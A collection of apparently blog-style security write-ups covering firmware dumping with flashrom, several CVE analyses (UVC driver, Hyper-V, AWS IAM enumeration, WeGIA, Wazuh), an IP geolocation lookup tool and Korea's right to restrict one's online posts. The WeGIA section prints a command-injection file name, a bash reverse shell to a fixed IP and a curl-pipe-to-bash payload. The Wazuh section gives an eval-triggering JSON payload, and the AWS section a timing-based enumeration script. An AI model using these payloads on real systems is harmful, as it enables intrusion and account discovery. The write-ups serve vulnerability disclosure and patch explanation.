If you need to extract firmware, it's best to try the other methods mentioned above before opting for a Flash memory dump.
The flow for performing a Flash memory dump using flashrom is as follows:
Here's a list of the required equipment and tools:
Flashrom is a development tool that allows you to flash data and images to flash chips.
It offers functions like detecting, reading, writing, verifying, and erasing, which makes it useful for embedded hacking to extract firmware from flash memory.
You need to install the necessary dependencies and use meson to install it on the Raspberry Pi.
Prepare your Raspberry Pi in 64-bit mode for installation.
sudo apt-get install -y gcc meson ninja-build pkg-config python3-sphinx libcmocka-dev libpci-dev libusb-1.0-0-dev libftdi1-dev libjaylink-dev libssl-dev
git clone https://github.com/flashrom/flashrom
cd flashrom
meson setup builddir
meson compile -C builddir
meson test -C builddir
meson install -C builddir
When extracting the chip with flashrom, performing the dump while the chip is still attached to the board may result in an unsuccessful extraction.
The exact reason varies by device and board, but typically the power from the Raspberry Pi ends up feeding the entire board rather than just the chip, which can introduce noise that interferes with the extraction.
The following image shows that merely touching the Raspberry Pi's VCC and GND pins to the corresponding pins on the Flash memory chip supplies power to the board.
For this reason, it's better to remove the chip from the board and connect only the chip.
Use a heat gun to melt the solder and remove the chip from the board.
Be cautious during this process as the risk of damaging the board is quite high.
Typically, Flash memory used in low-power IoT and embedded devices is an 8-pin chip that uses SPI communication.
While the pin assignments may vary depending on the chip model and vendor, the function of the 8 pins is usually the same, so refer to the datasheet for the pinout.
The datasheet provides all the information for using and describing the chip, so make sure to consult it!
The roles of each of the 8 pins of Flash memory are as follows:
Connect the Raspberry Pi's GPIO pins to the Flash memory's pins.
The VCC, HOLD, and WP pins on the Flash memory all take the VCC power signal. Since the Raspberry Pi's GPIO header doesn't have enough VCC pins, it's more convenient to supply the VCC signal through a breadboard or a similar setup.
Use IC test hook clips to connect the pins and begin the extraction process.
The thinner the clip, the easier the connection, so it's recommended to use thin test clips.
Once everything is connected, execute the following commands in the Raspberry Pi terminal to start the extraction:
# Check connection and check chip name
sudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=2000 -V

# Extraction
sudo flashrom -p linux_spi:dev=/dev/spidev0.0 -r [filename]
sudo flashrom -p linux_spi:dev=/dev/spidev0.0 -c [Chipname] -r [filename]
If the chip is supported, flashrom will begin the extraction process immediately.
However, if the chip is not supported, you can check flashchips.h and flashchips.c. If the chip is not listed there, you can add it manually and rebuild flashrom to perform the extraction.
Refer to the datasheet to add the chip information to the flashchips.c file.
const struct flashchip flashchips[] = {
/*
 * .vendor          = Vendor name
 * .name            = Chip name
 * .bustype         = Supported flash bus types (Parallel, LPC...)
 * .manufacture_id  = Manufacturer chip ID
 * .model_id        = Model chip ID
 * .total_size      = Total size in (binary) kbytes
 * .page_size       = Page or eraseblock(?) size in bytes
 * .tested          = Test status
 * .probe           = Probe function
 * .probe_timing    = Probe function delay
 * .block_erasers[] = Array of erase layouts and erase functions
 *   {
 *     .eraseblocks[] = Array of { blocksize, blockcount }
 *     .block_erase   = Block erase function
 *   }
 * .printlock       = Chip lock status function
 * .unlock          = Chip unlock function
 * .write           = Chip write function
 * .read            = Chip read function
 * .voltage         = Voltage range in millivolt
 */
With this process, you can successfully dump the firmware stored in the chip!
After removing the Flash memory chip, the device won't work until it's reassembled...
But reassembly is simply the reverse of disassembly!
Once the Flash memory chip is properly (!) re-soldered, the device will be usable again!
By extracting the firmware and restoring the device, you get the best of both worlds!
Next, we will cover UART/JTAG debugging port connections, another commonly attempted technique in embedded hacking. Thank you!
This vulnerability occurs in the uvc_parse_format function of the UVC (USB Video Class) driver. The problem is that, when parsing frame descriptors, an undefined frame type (e.g. UVC_VS_UNDEFINED; in the actual code, the case where ftype is 0) is not handled properly, which can lead to an out-of-bounds (OOB) write.

Code before the patch

The condition of the while loop that parses frame descriptors looks like this:

while (buflen > 2 && buffer[1] == USB_DT_CS_INTERFACE &&
       buffer[2] == ftype) {
        // frame parsing ...
}
ftype indicates the type of frame being parsed and is set to values such as UVC_VS_FRAME_UNCOMPRESSED, UVC_VS_FRAME_FRAME_BASED, or UVC_VS_FRAME_MJPEG. For certain formats (e.g. the DV format), ftype is set to 0, which means that no actual frame descriptors exist.

The problem is that when ftype is 0 (i.e. UVC_VS_UNDEFINED), the condition buffer[2] == 0 can still be true, so the loop runs and the computed frame buffer size can become inaccurate.

Before the patch, the loop therefore executed even when ftype was 0, and the sizes of those descriptors were included in the buffer calculation. This leads to incorrect memory accesses for undefined frame types and creates the risk of an OOB write into the buffer. If exploited, an attacker could corrupt kernel memory, undermine system stability, or, in severe cases, cause critical security issues such as privilege escalation and remote code execution.
Code after the patch

An additional check on the ftype value (ftype &&) was added to the while loop condition:

while (ftype && buflen > 2 && buffer[1] == USB_DT_CS_INTERFACE &&
       buffer[2] == ftype) {
        // frame parsing ...
}

With this change, the loop no longer runs when ftype is 0 (an undefined frame type), preventing the incorrect parsing.

In short, the patch adds an ftype check to the while loop condition so that frame descriptor parsing is skipped entirely when ftype is 0. The buffer size calculation error caused by an undefined frame type (e.g. UVC_VS_UNDEFINED) can no longer occur, so the OOB write into the buffer is prevented before it can be attempted. As a result, the risk of memory corruption and malicious code execution is greatly reduced.
AWS IAM (Identity and Access Management) is a web service for securely managing access to AWS resources.

Two vulnerabilities were found that make it possible to check whether any user with IAM console sign-in enabled actually exists.

If an AWS IAM user has MFA (multi-factor authentication) enabled, a difference in the login flow reveals whether that user exists.

When an IAM user signs in to the AWS web console, the flow works as follows: if the user exists, the console moves on to the MFA code entry page; if not, an error message is displayed.

Because the console proceeds to the MFA code entry page even when the password is wrong, as long as the username exists, it is easy to confirm whether a given IAM user exists.

AWS judged this issue to be an accepted risk, so no CVE was assigned.
For IAM users without MFA, user enumeration can instead be triggered through a timing attack.

When an IAM user with MFA disabled logs in, the flow looks the same whether or not the user exists. However, if there is a measurable difference in server response time, an attacker can submit a series of usernames and analyze the response times to infer which users exist.

Testing with Burp Suite showed that for an IAM user that actually exists (bfme-console), the response time increased by roughly 100 ms, which is enough to tell that the user exists.
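Below is a hedged sketch of how such a timing comparison could be measured; the endpoint and payload fields are placeholders, not the real AWS sign-in API, and the only point is the median-latency comparison.

import statistics
import time

import requests  # pip install requests

SIGNIN_URL = "https://signin.example.com/authenticate"  # hypothetical endpoint

def median_latency(username, attempts=10):
    samples = []
    for _ in range(attempts):
        start = time.perf_counter()
        requests.post(SIGNIN_URL,
                      data={"account": "123456789012",       # placeholder fields
                            "username": username,
                            "password": "invalid-password"},
                      timeout=15)
        samples.append(time.perf_counter() - start)
    return statistics.median(samples)

for candidate in ["bfme-console", "no-such-user"]:
    print(candidate, round(median_latency(candidate), 3), "s")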
This vulnerability was assigned CVE-2025-0693, and AWS patched it by delaying the response time equally in every authentication failure scenario.
Hello, I'm empty. In the field of security, we often need to analyze suspicious IP addresses. When using various IP lookup services, the verdict on whether an IP is malicious may differ, but "country information, ASN information, ISP information" are consistently provided. I became curious about where and how this data is obtained and served, so I decided to investigate.
Broadly speaking, IP information can be retrieved via an external IP lookup service, a local IP database, or the Whois protocol.
Each method offers different speeds, accuracy, and freshness of data, so it's important to choose the method that best fits your needs.
Some services provide reputation (malicious or fraud-related) information, others provide port scanning results, and others geographic location information. However, country, ASN, and ISP name are virtually always provided, no matter which service you use.
Type of Service | Examples |
---|---|
Reputation Check | Virustotal, AbuseIPDB |
Port Scanner | Censys, Shodan, Criminal IP |
IP Geolocation | MaxMind, ipinfo, IP2Location, IPQualityScore |
Although the data scope and content may differ subtly by service, almost every IP lookup service commonly returns the IP's country, ASN, and ISP name. Personally, I often use the ipinfo service via a simple curl command in the terminal.
Interestingly, different services can display different countries or location info for the exact same IP. For example, when looking up an IP address from the Hong Kong-based cloud provider SonderCloud Limited on VirusTotal, it shows as being in the United States, while ipinfo displays Hong Kong.
These discrepancies arise from a range of factors. Even if a company is registered in Hong Kong, its actual server could be physically located in the US, or vice versa. Additionally, some services base the IPโs country not on the physical location but on the country in which the business is registered, or on the IP block assignment recorded by a Regional Internet Registry (RIR).
On top of that, the update frequency and data collection methods vary by service, so even the same IP may give different results from different sources.
Here, "database" doesn't refer to applications like MySQL or PostgreSQL; rather, it refers to a prestructured "IP information database file" that lists IP addresses along with details such as country and ASN. These can be implemented in various formats, like JSON, CSV, or MMDB, and are most commonly used in .mmdb format.
MMDB is a file format developed and published by MaxMind. Because it's an open format, MaxMind and many other IP information services provide their IP database files in .mmdb format. Many security devices that require real-time performance load the mmdb file into memory for super-fast lookups (on the order of less than 0.00n seconds per IP).
import maxminddb

ip = "8.8.8.8"
with maxminddb.open_database("country_asn.mmdb") as reader:
    result = reader.get(ip)
    print(result)
{ "as_domain": "google.com", "as_name": "Google LLC", "asn": "AS15169", "continent": "NA", "continent_name": "North America", "country": "US", "country_name": "United States"}
However, because data such as ASN can change daily, you need to periodically update your local database file to stay current.
Lastly, there's the Whois protocol. When you query an IP address using Whois, it sends a request to the appropriate RIR's Whois server, which then returns detailed information about the IP. Since the data is maintained directly by an RIR, it's typically highly accurate.
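If you want to see what a raw Whois query looks like without any tooling, here is a minimal Python sketch of the plain Whois protocol (TCP port 43). whois.iana.org is used here only as a convenient starting point; it replies with a referral to the RIR responsible for the address block.

import socket

def whois(query, server="whois.iana.org", port=43):
    # Open a TCP connection to the Whois server, send the query plus CRLF,
    # and read until the server closes the connection (RFC 3912).
    with socket.create_connection((server, port), timeout=10) as sock:
        sock.sendall((query + "\r\n").encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

print(whois("8.8.8.8"))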
Windows doesn't include a built-in Whois command, so I sometimes use the NirSoft tool IPNetInfo, which is particularly handy for bulk lookups.
Because Whois is a query-based method that communicates with a remote server, network latency is inevitable; and if the server is under heavy load or the queries are excessive, your requests might get blocked. For instance, the IPNetInfo product page states:
Sometimes the ARIN Whois server may be down and fail to respond to IPNetInfo's WHOIS queries, which prevents IPNetInfo from retrieving IP addresses. If this happens, try again later.
Below is a summary of each method:
Method | Freshness | Accuracy | Speed | Notes |
---|---|---|---|---|
1) External Service | Frequently updated | Various sources | Network latency | - Many services are updated in real-time or very often, so you can get the latest data - However, there may be network delays depending on traffic or server conditions - Excessive queries or poor server conditions can cause slow or blocked responses |
2) Build Your Own DB | Periodic updates | Aggregated data | Local lookups (fast) | - Very fast since you're querying locally - If the update cycle is too long, freshness and accuracy can suffer |
3) Whois Server | RIR data | Official info | Network latency | - Highly accurate, since the info comes directly from RIRs - Excessive queries or server issues can cause slow or blocked responses |
Therefore, if you frequently query IPs and need quick responses in an environment where external internet access might not be possible, building your own local country database is the best approach. Below, I'll show you how to collect source data from RIRs and build an IP-country information database in your local environment.
The public IPv4 addresses we use, roughly 3.7 billion of them, are a limited resource. To manage them effectively, a central coordinating body is required. That role is filled by ICANN (Internet Corporation for Assigned Names and Numbers) in the United States.
ICANN manages top-level internet resources like IP addresses, DNS, and protocol numbers. Because ICANN can't manage all IP addresses directly, the IANA (Internet Assigned Numbers Authority), an organization under ICANN, allocates IP address ranges to RIRs (Regional Internet Registries) by region.
There are currently five RIRs: ARIN (North America), RIPE NCC (Europe), LACNIC (Latin America), AFRINIC (Africa), and APNIC (Asia). Of these, LACNIC and APNIC maintain NIRs (National Internet Registries) to further subdivide responsibilities at a national level.
In other words, IP addresses are managed in this chain: ICANN → IANA → RIR → NIR → ISP. In South Korea, for example, KRNIC (operated by KISA) manages the address space delegated from its RIR and re-allocates it to ISPs; see https://krnic.kisa.or.kr/jsp/business/management/ispInfo.jsp for details.
Each RIR routinely uploads statistics in a specific format to a specific path (named stats) on their FTP server, at a specific time (23:59:59), under a specific file name.
You can learn more about the file format details by checking out APNIC's RIR statistics exchange format.
Now that we know the data sources (RIR FTP servers) and the file formats, we can build a tool. For example, you could download the delegated-{REGISTRY}-latest file from every RIR's FTP server, parse the IPv4 allocation records, and store them as a sorted list of ranges for fast lookups. Here's some sample code:
# builtin modules
import os
import ipaddress
import asyncio
from datetime import datetime

# install modules
import aiohttp

intervals = []
today = datetime.now().strftime("%Y%m%d")
RIR_URLS = [
    "https://ftp.apnic.net/stats/apnic/delegated-apnic-extended-latest",
    "https://ftp.arin.net/pub/stats/arin/delegated-arin-extended-latest",
    "https://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-extended-latest",
    "https://ftp.ripe.net/pub/stats/ripencc/delegated-ripencc-extended-latest",
    "https://ftp.afrinic.net/stats/afrinic/delegated-afrinic-extended-latest",
]
MAPPING_DATABASE = f"./rsc/{today}_mapping.db"

# Download
async def fetch(session, url):
    async with session.get(url) as response:
        print(f"[{response.status}] - {url}")
        content = await response.read()
        filename = url.split("/")[-1]
        filepath = f"./rsc/{today}_{filename}"
        with open(filepath, "wb") as f:
            f.write(content)
        return

# Download coroutine
async def download():
    async with aiohttp.ClientSession() as session:
        await asyncio.gather(*(fetch(session, url) for url in RIR_URLS))
    print("Download Complete")
    return

# Load database
def init_database():
    if not os.path.exists("./rsc"):
        os.mkdir("./rsc")

    # If the IP database set exists, load it into memory
    if os.path.exists(MAPPING_DATABASE):
        print("Database load")
        with open(MAPPING_DATABASE, "r") as f:
            for line in f:
                start_ip, end_ip, country = line.strip().split(",")
                intervals.append((int(start_ip), int(end_ip), country))
        return

    # If it doesn't exist, download, process, and save
    asyncio.run(download())
    for rir_url in RIR_URLS:
        filename = rir_url.split("/")[-1]
        filepath = f"./rsc/{today}_{filename}"
        with open(filepath, "r") as f:
            for line in f:
                line = line.strip().split("|")
                if len(line) != 8 or line[2] != "ipv4":
                    continue
                country = line[1]
                ip = line[3]
                ip_range = line[4]
                start_ip = int(ipaddress.IPv4Address(ip))
                end_ip = (int(ipaddress.IPv4Address(ip)) + int(ip_range)) - 1
                result = (start_ip, end_ip, country)
                intervals.append(result)

    # Save the data
    intervals.sort(key=lambda x: x[0])
    with open(MAPPING_DATABASE, "w") as f:
        for interval in intervals:
            line = f"{interval[0]},{interval[1]},{interval[2]}"
            f.write(line + "\n")
    print("Database load")
    return

# Search
def search(search_ip):
    result = None
    try:
        search_ip = int(ipaddress.IPv4Address(search_ip))
    except:
        return None
    left, right = 0, len(intervals) - 1
    while left <= right:
        mid = (left + right) // 2
        start_ip, end_ip, country = intervals[mid]
        if start_ip <= search_ip <= end_ip:
            result = country
            break
        elif start_ip > search_ip:
            right = mid - 1
        else:
            left = mid + 1
    return result

def main():
    init_database()
    while True:
        ipv4 = input("Insert IPv4: ")
        r = search(ipv4)
        print(r)

if __name__ == "__main__":
    main()
Once downloaded from the RIRs, you'll see that around 253,714 IP ranges (covering the roughly 3.7 billion public IPs) exist. That effectively means you can figure out the country of any public IP. Interestingly, the program I wrote above seems to perform lookups 30 to 250 times faster than queries using .mmdb.
My guess is that MMDB might have more granularly subdivided IP ranges and also stores additional data (like ASN), so that could explain the difference.
RIR data only contains information such as which IP addresses were assigned (e.g., IP block allocations). It doesn't tell you which ASNs those IPs belong to. To figure that out, you'd need to collect data from BGP (Border Gateway Protocol) tables. Because this post has already grown quite long, I'll continue this topic in a future article.
For sanity's sake, I personally recommend regularly downloading an .mmdb file from ipinfo or another provider, if feasible.
A PoC has been released for a privilege escalation vulnerability caused by a heap buffer overflow in the Windows Hyper-V NT Kernel Integration VSP component.

The vulnerability occurs in NtCreateCrossVmEvent, a syscall related to the CrossVmEvent object introduced in Windows 10 1903. According to the Microsoft advisory, the affected versions range from Windows 10 21H2 to Windows 11 24H2.

To trigger the vulnerability, the Windows Sandbox feature must be enabled.
CrossVmEvent is an object related to the Virtual Service Provider, which handles efficient resource management and communication between the host and guest machines. The vkrnlintvsp.sys driver that services this syscall modifies the object's DACL in its VkiRootAdjustSecurityDescriptorForVmwp function.
__int64 __fastcall VkiRootAdjustSecurityDescriptorForVmwp(void *a1, char a2)
//...
  if ( ObjectSecurity >= 0 )
  {
    ObjectSecurity = SeConvertStringSidToSid(
                       L"S-1-15-3-1024-2268835264-3721307629-241982045-173645152-1490879176-104643441-2915960892-1612460704",
                       &P);
    if ( ObjectSecurity >= 0 )
    {
      // Patched code
      if ( (Feature_2878879035__private_IsEnabledDeviceUsage)(v6) )
      {
        v7 = RtlLengthSid(Sid);
        v8 = RtlLengthSid(P) + 16 + v7;
        v9 = Dacl->AclSize + v8;
        if ( v9 < v8 )
        {
          ObjectSecurity = 0xC0000095;
          goto LABEL_20;
        }
      }
      // Vulnerable code
      else
      {
        SidLength = RtlLengthSid(Sid) + RtlLengthSid(P);
        dwAclSize = Dacl->AclSize + SidLength + 16;
      }
      Pool2 = ExAllocatePool2(256i64, dwAclSize, 1867671894i64);
      v4 = Pool2;
      if ( Pool2 )
      {
        memmove(Pool2, Dacl, Dacl->AclSize);
//...
In the pre-patch code, an integer overflow can occur while computing the pool allocation size when SIDs are added to the DACL of a user-controllable object. Because there is no proper bounds check, the pool is allocated with a smaller-than-expected dwAclSize.

As a result, the memmove call that copies AclSize bytes into the undersized pool buffer allows an overflow of up to 0xfff0 bytes.
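To illustrate the failure mode, here is a tiny Python sketch that emulates how an unsigned size calculation can wrap and yield an undersized allocation; the 16-bit mask is an assumption chosen for demonstration, not the exact integer width used by the driver.

# Illustrative only: emulate an unsigned size calculation that wraps around.
MASK = 0xFFFF  # assumed width, for demonstration

def alloc_size(acl_size, sid_length):
    return (acl_size + sid_length + 16) & MASK

acl_size, sid_length = 0xFFF0, 0x20
size = alloc_size(acl_size, sid_length)
print(hex(size))                                   # wraps to a small value
print("undersized" if size < acl_size else "ok")   # memmove of acl_size bytes now overflows
# The patch's check is essentially: if (acl_size + needed) < needed -> reject (overflow).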
After triggering the vulnerability, the PoC uses an I/O Ring exploitation technique. It allocates an array of _IOP_MC_BUFFER_ENTRY pointers in the paged pool, sprays, and then uses the overflow to overwrite the array with pointers to fake IOP_MC_BUFFER_ENTRY objects allocated in user land. It then uses BuildIoRingWriteFile() and BuildIoRingReadFile() to obtain arbitrary kernel read/write and escalate privileges.
As shown above, the patch aborts the operation when the result of adding AclSize to the SID sizes is smaller than the SID-size term, i.e. when the addition has overflowed.
An RCE vulnerability caused by insufficient parameter validation was found in WeGIA, an application that provides a web-based management system for institutions.

The vulnerability occurs in a statement inside importar_dump.php.
$log = shell_exec("mv ". $_FILES["import"]["tmp_name"] . " " . BKP_DIR . $_FILES["import"]["name"]);
The shell_exec() function runs an mv command that moves the uploaded temporary file. Because the parameters are not validated, this results in a command injection vulnerability.

In addition, since the command moves the uploaded temporary file, both a reverse shell and a web shell upload are possible.

There is a redirect after the session check, but no statement that terminates execution.
<?php
if (!isset($_SESSION["usuario"])){
    header("Location: ../../index.php");
}
Because of this, arbitrary code execution and file upload attacks are possible without any login.

The PoC is as follows.
First, perform a command injection that executes the sleep 5 command: upload a file whose name is a with the command appended, and you can confirm that sleep 5 runs (the payload and a request sketch follow below).
a;sleep 5
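As a hedged sketch of that request (the host and path below are assumptions; only the importar_dump.php script name and the import multipart field come from the code shown earlier):

import requests  # pip install requests

# Hypothetical target URL; adjust to the actual deployment path.
TARGET = "http://target.example/WeGIA/html/configuracao/importar_dump.php"

# The injected command travels in the uploaded file's *name*.
files = {"import": ("a;sleep 5", b"dummy", "application/octet-stream")}
resp = requests.post(TARGET, files=files, timeout=30)
print(resp.status_code, resp.elapsed)  # a ~5 s delay suggests the injection ran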
Next, build a reverse shell as shown below.
bash -i >& /dev/tcp/172.30.137.198/7777 0>&1
Piping this into a bash shell with | executes the reverse shell. An example payload looks like this:
a;curl -L <your_page_responses_rev_shell_code> | bash
For the web shell upload, the existing file upload functionality can be used to easily upload a PHP web shell. In the PoC, a PHP web shell was uploaded under the name l8BL.php.
The vulnerability was fixed by escaping the special characters used for command injection with the escapeshellarg() function, and by adding an exit() call after the session check so that execution stops for unauthenticated requests.
CVE-2025-24016 is an RCE vulnerability caused by unsafe deserialization in Wazuh, an open-source SIEM (Security Information and Event Management) platform. Wazuh consists mainly of the Wazuh Agent, the Wazuh Manager, and Elasticsearch & Kibana.
The root cause is the use of the eval function in the Wazuh Manager. When some Wazuh Manager APIs deserialize JSON requests with json.loads(), they call the as_wazuh_object function through the object_hook option to post-process the result.
If the JSON contains an __unhandled_exc__ key, as_wazuh_object calls eval using the __class__ and __args__ values found inside it. Because user input is passed to eval as-is, arbitrary command execution is possible.

For example, sending the following JSON in an API request causes os.system("bash") to be executed, resulting in RCE.
{ "__unhandled_exc__": { "__class__": "os.system", "__args__": [ "bash"]}}
The vulnerability was patched by replacing eval with literal_eval, which only handles a restricted set of types (strings, bytes, numbers, tuples, lists, dicts, sets, booleans, None, and Ellipsis).
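To illustrate why swapping eval for literal_eval closes the hole, here is a small Python comparison, independent of Wazuh's code:

import ast

payload = '__import__("os").system("id")'

# eval() would happily execute an attacker-controlled expression like this:
# eval(payload)  # do not run

# ast.literal_eval() only accepts literal constants and containers,
# so the same payload raises ValueError instead of executing code.
try:
    ast.literal_eval(payload)
except ValueError as e:
    print("rejected:", e)

print(ast.literal_eval('{"numbers": [1, 2, 3], "ok": True}'))  # plain literals still work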
Hello, this is romi0x!
Have you ever wanted to erase embarrassing moments from the internet? Or have you tried to delete a post but couldn't find a way to remove it? Sometimes, you may not be able to delete your posts because there is no delete button or you are no longer a member of the service. To address this issue, there is a legal right called the "Right to Request Access Restriction for Personal Online Posts."
In this article, I will introduce the "Right to Request Access Restriction for Personal Online Posts", which allows individuals to request restrictions on public access to posts they have uploaded.
The "Right to Request Access Restriction for Personal Online Posts" allows individuals to request restrictions on access to their own posts on the internet. This right ensures that information and communication service providers, as personal data controllers, comply with privacy protection principles, while allowing users to safeguard their personal data.
Since 2016, South Korea has introduced this right under the Act on Promotion of Information and Communications Network Utilization and Information Protection (the Information and Communications Network Act). Under this system, individuals can request access restrictions rather than deletion of their posts.
When it comes to online information deletion requests, South Korea's Right to Request Access Restriction for Personal Online Posts and the globally recognized "Right to Be Forgotten" share similar goals but differ in legal application and scope.
In the European Union, there is a legal right called the "Right to Be Forgotten." This right was officially recognized in 2014 following a ruling by the Court of Justice of the European Union (CJEU) in the Google Spain case. The General Data Protection Regulation (GDPR), which took effect in 2018, explicitly defines this right.
One major case highlighting this right is the Google Spain ruling itself, in which an individual successfully requested the delisting of outdated personal information from search results.
While the EU's approach shares similarities with Korea's system, European law places a stronger emphasis on personal data protection.
The Right to Be Forgotten is not legally recognized in the United States. Instead, digital platforms offer users the ability to delete their own posts. For example, social media platforms like Facebook and Twitter allow users to remove their posts at any time. However, due to the strong emphasis on freedom of expression, content related to public figures or issues of public interest may not be easily removed.
Category | South Korea (Right to Request Access Restriction) | European Union (Right to Be Forgotten) | United States |
---|---|---|---|
Scope | Posts made by the individual | Includes third-party content | Limited personal data protection laws |
Deletion Process | Search restriction (post remains) | Search result removal & content deletion possible | Limited removal possible |
Legal Basis | Information and Communications Network Act | GDPR, CJEU rulings | Freedom of Expression, some state laws |
So, how can individuals in South Korea exercise this right and request access restrictions on their posts?
Users can exercise this right for posts they have made on online platforms, including comments, photos, and videos. If a deceased individual has designated a representative or if the family of the deceased requests access restriction, the request can still be made. If the designated representative and the family have differing opinions, the designated representative's decision generally takes precedence.
Any individual can submit a request, and it should be directed to the website administrator or search engine provider.
Once a request is made, website administrators and search engine providers must follow a review process to determine the appropriate action.
Once access restriction measures have been applied, the service provider must notify the requester of the result.
If a third party objects to the restriction, the service provider will review the submitted evidence and decide whether to uphold the restriction or lift it.
Major Korean portal sites Naver (N) and Daum (D) provide their own guidance pages for requesting access restriction.
Reference: Personal Information Protection Commission, "Guide to the Right to Request Access Restriction for Personal Online Posts," December 2024.